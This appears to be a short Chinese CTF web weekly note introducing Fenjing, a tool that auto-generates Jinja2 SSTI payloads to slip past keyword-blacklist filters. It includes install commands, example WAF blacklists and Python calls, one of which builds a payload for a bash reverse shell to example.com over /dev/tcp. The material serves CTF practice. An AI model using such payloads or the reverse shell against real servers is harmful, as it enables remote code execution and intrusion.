🕸️CTFWeb周报10
[SSTI自动化工具]Fenjing 专为CTF设计的Jinja2 SSTI全自动绕WAF脚本 | A Jinja2 SSTI cracker for bypassing WAF, designed for CTF https://github.com/Marven11/FenJing 使用pip安装运行 pip install fenjing 打开webui python -m fenjing webui 直接import库来生成payload # 精简代码 from fenjing import exec_cmd_payload def waf(s: str): blacklist = [ "config", "self", "g", "os", "class", "length", "mro", "base", "lipsum", "[", '"', "'", "_", ".", "+", "~", "{{", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9", ] return all(word not in s for word in blacklist) shell_payload, will_print = exec_cmd_payload(waf, '要执行的shell') print(f"{shell_payload}") # github readme中提供的 from fenjing import exec_cmd_payload, config_payload import logging logging.basicConfig(level = logging.INFO) def waf(s: str): blacklist = [ "config", "self", "g", "os", "class", "length", "mro", "base", "lipsum", "[", '"', "'", "_", ".", "+", "~", "{{", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9", "0","1","2","3","4","5","6","7","8","9" ] return all(word in s for word in blacklist) if __name__ == "__main__": shell_payload, _ = exec_cmd_payload(waf, "bash -c \"bash -i >& /dev/tcp/example.com/3456 0>&1\"") config_payload = config_payload(waf) print(f"{shell_payload=}") print(f"{config_payload=}") 无参数RCE 正则匹配网页:https://regex101.com/ ...